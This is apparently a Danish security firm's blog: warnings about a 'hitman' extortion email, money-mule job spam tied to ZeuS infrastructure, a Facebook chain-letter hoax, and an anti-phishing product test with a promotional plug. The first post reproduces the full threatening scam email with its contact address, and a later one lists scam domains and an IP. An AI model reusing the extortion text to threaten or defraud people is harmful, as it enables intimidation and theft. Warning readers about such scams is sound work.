Folk der modtager en e-mail med nedenstående ordlyd, eller med andet indhold, og som truer med at en lejemorder er sat til at myrde dig, bør slette den pågældende e-mail og IKKE respondere tilbage til afsenderen.

Denne type scam/svindel er kendt som "The Hitman Scam" og er groft beset blevet oversat fra englesk til dansk ved brug af en auto-oversætter:

Kære ven,

Goddag til dig.

Er meget ked af for dig min ven, det er en skam, at dette er, hvordan dit liv kommer til at ende, så snart du ikke overholder. Som du kan se, er der ikke behov for at indføre mig til dig, fordi jeg ikke har nogen forretninger med dig, min pligt som jeg mailing dig nu, er bare at KILL / myrde dig, og jeg er nødt til at gøre det, før de næste syv dage som jeg allerede har betalt til at dræbe dig.

Jeg vil have dig til at læse denne besked meget nøje, og holde hemmelighed med dig till yderligere notice.Someone du ringe til en ven vil have dig Dead med alle midler, og den person har brugt en masse penge på this.I sendte mine folk ud for at spore dig ned, har de fulgt dig nøje for en uge og tre dage nu og har rapport til mig, at du er uskyldig i anklagen.

Jeg ringede til min klient tilbage og spørge ham om din e-mailadresse, som jeg ikke fortælle ham, hvad jeg ønskede at gøre med det, og han gav det til mig, hvorfor jeg bruger det til at kontakte dig nu. Som jeg skriver til dig nu mine mænd overvåger dig, og de fortæller mig alt om dig.

Nu ønsker du at leve eller dø? Som nogen har betalt mig at dræbe dig. Kom tilbage til mig nu, hvis du er klar til at betale nogle gebyrer for at skåne dit liv, så jeg kan give dig den tape, der indeholder mine klienter anmode for mig at opsige dig, som vil være nok beviser for dig at tage ham for en domstol (hvis du ønsker til), og hvis du ikke er klar til min hjælp, så vil jeg fortsætte med mordet straight-up.

ADVARSEL: Må ikke tænke for at kontakte politiet eller endda fortælle nogen, fordi jeg vil vide. HUSK, der kender du meget vel have dig DEAD! Jeg VIL udvide den til din familie, incase jeg bemærker noget morsomt.

Kontakt mig på denne e-mail, fordi du ikke vil være i stand til at nå mig på dette, da det vil blive slettet nu, og hvis du ikke gør det, vil jeg nødt til at fortsætte med mordet!

E-mail: fbookdepartment@gmail.com

Forventer dit svar, før de næste 48 timer ellers .....

-

Vi har set denne type 419-scams, også kendt som Nigeria svindel, udvikle sig i mange forskellige retninger henover de seneste måneder, og "lejemorder" scammet er blot en afart af disse svindel/fup numre, som alle har til formål at tvinge eller lokke penge ud af ofret.

Herunder eksempler på tilsvarende svindel men på Engelsk:
http://urbanlegends.about.com/library/bl_hit_man_scam.htm
http://www.scamwatch.gov.au/content/index.phtml/itemId/802517

Og tilmed en officiel FBI advarsel:
http://www.fbi.gov/anchorage/press-releases/2013/fbi-warns-of-extortion-hitman-scam

I den forløbne uge er vores honeypot blevet fyldt op med attraktive jobtilbud:

Svar  bedes sendes til [navn]@google-consulting.com.

Hvis vi kigger nærmere på dette domænenavn, afsløres lidt spændende info. Google-consulting bruger nemlig navneserverne:

ns1.poker-roomz.com
ns2.poker-roomz.com

Det pågældende domæne er registreret med mailadressen boykintool @ aol.com. Denne mail adresse er spændende og interessant på samme tid. Med en simpel Google søgning kan den e-mail adresse nemlig knyttes direkte til spamkampagner, hvor it-kriminelle forsøger at inficere vilkårlige maskiner med en informationstyv i ZeuS klassen. Denne type malware ser vi hyppigt indsamle kreditkort oplysninger, som så misbruges til at købe varer bl.a. i danske eHandel butikker. Det er således nærliggende at konkludere, at personerne bag disse spamkampagner høster kreditkort oplysninger, misbruger disse og køber varer for så at flytte varerne videre til pakke- eller penge muldyr som rekrutteres via disse kampagner.

I tidligere kampagner er følgende domæner blevet anvendt:

apple-euro.com
firsteuro-consulting.com
myjobbg.com
jobseuropenet.com
euroconsaltinn.com

ZeuS forbindelsen
Vores ven og blogger Dancho Danchev rapporterede tilbage i marts i en artikel om mails der foregav at være fra et pakkepost firma ”ADP” med en meddelelse om en pakke til aflevering. I stedet for en pakke, bliver det uheldige offer beskudt med ammunition fra det berygtede exploitkit ”Black Hole”.

At de aktive navneservere peger på IP adressen 67.159.12.94 kan vi ligeledes koble direkte med ZeuS:
http://blog.dynamoo.com/2013/06/malware-sites-to-block-12613.html
https://zeustracker.abuse.ch/monitor.php?host=ebayweekdeal.com

Meget tyder på, at det er lykkedes bagmændene at genne tilpas mange uheldige ofre ind i folden, som nu skal malkes i stor stil.

Vi fraråder alle at svare på disse spammails. Læs også vores artikel om muldyr og hvilken risiko du løber hvis du lader dig lokke.

En hoax/kædebrev spreder sig i disse dage på Facebook.

Det eneste råd der findes mod den slags er at "uddanne" venner og bekendte, så de ikke ukritisk sender den slags videre og derved unødigt bekymrer andre brugere.

Typisk kan denne slags kædebreve genkendes ved ordlyden "ADVARSEL!!!" og "Kopier og spred det yderligere" - "til alle venner og bekendte" - hvorved det opnår den ønskede virale effekt. Ofte er denne slags historier baseret på lige dele af sandhed og opspind.

I dette tilfælde har den seneste hoax/kædebrev følgende indhold:

"ADVARSEL!!!! ADVARSEL!!!! Kontroller din postkasse! ER der en gul rund prik (klistermærke), eller andre former for mærkning, du ikke genkender betyder det, at du ikke har en alarm i huset. En bande er derude og tjekker husene og de kan med metoden se på postkasserne hvor det er at let at begå indbrud. Kopier og spred det yderligere".

Vi poster løbende advarsler på vores hjemmeside om denne slags, så følg evt. med på vores blog, Facebook side eller Twitter profil.

AV-comparatives har testet diverse sikkerhedsprodukter rettet mod det private marked og deres evne til at forhindre slutbrugere i at tilgå websider som forsøger at fiske private oplysninger. Testen sender Slovakiske ESET og Russiske Kasperskpy til tops. I bunden finder vi F-Secure, VIPRE, Avast, G DATA og Qihoo.

AV-Comparatives har udført testen på en rigtig Windows 7 Professional
64-Bit og ved brug af browseren Internet Explorer 10, hvor man samtidig har deaktiveret det indbyggede antiphishing filter. Testen blev gennemført d. 22 Juli med 187 unikke phishing URLs indsamlet ca. en uge forinden.

Herhjemme i Danmark kender vi kun alt for godt til phishing problemet. Af samme grund har vi opbygget et lokalt antiphishing filter, som har særligt øje på phishing kampagner der rammer danske slutbrugere, men filteret beskytter også mod phishing kampagner i andre lande. Man kan få glæde af vores antiphishing filter ved at hente Heimdal på vores hjemmeside og tilkøbe en PRO licens som aktiverer anti-phishing beskyttelse mens også beskyttelse mod BOTnets og netbank tyve:
https://www.heimdalagent.com.

Som en interessant fodnote kan vi måske minde alle om, at CSIS faktisk var de første som gennemførte en test af antiphishing filtre. Det var tilbage i 2006:
http://sunbeltblog.blogspot.dk/2006/11/comparison-of-phishing-filters.html?m=1

Resultatet af den nye test findes i sin helhed på adressen (PDF dokument)
http://www.av-comparatives.org/wp-content/uploads/2013/08/avc_aph_201308_en.pdf